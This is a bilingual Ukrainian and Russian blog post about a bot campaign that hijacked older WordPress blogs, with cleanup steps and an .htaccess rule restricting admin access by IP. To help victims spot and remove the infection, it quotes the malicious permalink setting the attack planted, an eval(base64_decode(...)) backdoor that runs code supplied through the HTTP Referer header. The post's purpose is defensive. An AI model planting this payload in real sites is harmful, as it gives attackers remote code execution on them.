Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

[tab:Українською]

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

захищаєм блог від хакерівТак в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв’яка, бота (називайте як хочете) потрібно зробити:

 • В налаштуваннях ЧПУ, поміняти з
  /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
  на
  /%postname%/
  (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
 • Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: [email protected]
 • Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:

 • зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
 • створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.98.173
  

  а якщо у вас динамічна айпішка, то краще напишіть так:

  
  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.0.0/255.255.0.0
  

  Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.

 • Збережіть файл. Все.

Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп’ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам’ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»

Бережіть себе і бережіть свій блог.

[tab:По русски]

Вчера прошла волна атаки и взлома блогов на вордпрессе. И если погуглить, то можно судить, что пострадали тысячи блогов.

Но как все это произошло? А случилось вот что: кое-кто запустил в сеть бота, который находил старые версии WordPress (до версии 2.8.4) и пользуясь старым багом, регистрировал юзера и используя определенную ссылку получал права админа на блоге, потом под этим юзером менял шаблон ЧПУ в настройках, а далее модифицировал (заражал) код темы.

И хотя мой блог до сих пор работает на одной из старых версий вордпресса, но не пострадал. А все потому, что бот определял версию блога по мета-тегу, который автоматически прописывает вордпресс во все темы, а я этот тег давным-давно у себя удалил. Про то, как удалить этот тег, я писал ранее в статье: корисні функції в functions.php — советую и вам так же сделать ;)

А тем, кто уже пострадал от этого вируса, червья, бота (называйте как хотите) нужно:

 • В настройках ЧПУ, поменять с
  /%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
  на
  /%postname%/
  (у вас может отличаться структура, по аналогии думаю поймете, что где поменять :))
 • Найдите последнего зарегистрированного пользователя на вашем сайте и уничтожьте его! Скорее всего , это будет MikeWink E-mail: [email protected]
 • Обновите WordPress до версии 2.8.4

А если нет желания обновляться и хотите улучшить безопасность своего блога, то вы можете запретить всем доступ к админке, кроме себя, с помощю небольшой правки .htaccess
Конечно, было бы лучше, если у вас постоянный статический IP-адрес, тогда тольки бы его и указывали. Но в случае динамического айпи-адреса можете указывать диапазон адресов.
Для это сделайте следующее:

 • зайдите на сайт myip.ru чтобы узнать ваш IP адрес. К примеру: ВАШ IP-АДРЕС: 91.134.98.173
 • создайте файл .htaccess в папке wp-admin вашего блога и пропишите там следующее:
  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.98.173
  

  в случае динамического IP-адреса, напишите так:

  
  AuthUserFile /dev/null
  AuthGroupFile /dev/null
  AuthName "Access Control"
  AuthType Basic
  
  order deny,allow
  deny from all
  allow from 91.134.0.0/255.255.0.0
  

  Подробнее о синтаксисе директив Allow, Deny для Apache htaccess читайте здесь.

 • Сохраните файл. Все.

Теперь, к админке вашего блога зайти можете только вы с вашого компьютера. Ну а если вы будете в дороге, или в интернет-кафе и захотите, зайти в админку блога, а вас не будет пускать (скорей всего, вы увидите сообщение об ошибке 404), потому что IP-адрес не входит в указанный диапазон, то тогда вам нужно будет зайти по фтп на хостинг и временно переименовать файл .htaccess. И тут, наверное, кто-то из вас подумал: «Это я еще должен и пароль на фтп помнить для таких случаев?» — Ну а что вы хотели, приходится жертвовать удобством ради безопасности. Помните цитату: «Так вам шашечки или ехать?!»

Берегите себя и берегите свой блог.

[tab:END]